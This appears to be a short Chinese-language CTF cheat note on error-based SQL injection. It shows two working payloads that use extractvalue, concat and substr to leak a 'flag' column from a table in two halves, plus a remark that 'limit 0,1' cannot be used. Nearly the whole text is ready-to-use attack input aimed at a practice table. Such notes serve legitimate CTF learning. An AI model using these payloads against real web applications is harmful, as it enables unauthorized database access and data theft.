如果 flag 只出现一半,用substr(A,B,C)
查询flag
1' and (select extractvalue(1,concat('~',(select substr((select flag from test_tb), 1 , 31)))))
# 0-30位 左边30位
1'and (select extractvalue(1,concat('~',(select substr((select flag from test_tb), 31 , 60)))))
# 31-60位 右边边31位
不能用limit 0,1